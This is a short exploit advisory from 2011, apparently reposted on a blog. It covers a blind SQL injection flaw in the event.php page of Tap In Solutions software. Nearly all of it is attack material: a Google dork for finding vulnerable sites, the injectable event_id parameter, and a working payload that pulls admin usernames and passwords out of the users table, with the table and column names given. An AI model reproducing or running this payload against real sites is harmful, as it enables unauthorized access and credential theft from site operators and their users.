# Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability
# Date: 17.10.2011
# Author: poach3r
# Software Link: http://www.tapinsolutionsinc.com/
# Tested on: Windows XP SP3
# Google Dork: inurl:event.php?event_id= powered by Tap In Solutions
==========================================================================
# Vulnerable File :
==> event.php <==
# Exploit :
http://127.0.0.1/path/event.php?event_id=[SQL]
# Demo :
http://127.0.0.1/path/event.php?event_id=1/**/and/**/(select/**/substring(concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1
# Details :
Admin Table : users
Username Column : user_name
Password Column : password
==========================================================================
0 komentar — Skip to Comment
Posting Komentar — or Back to Content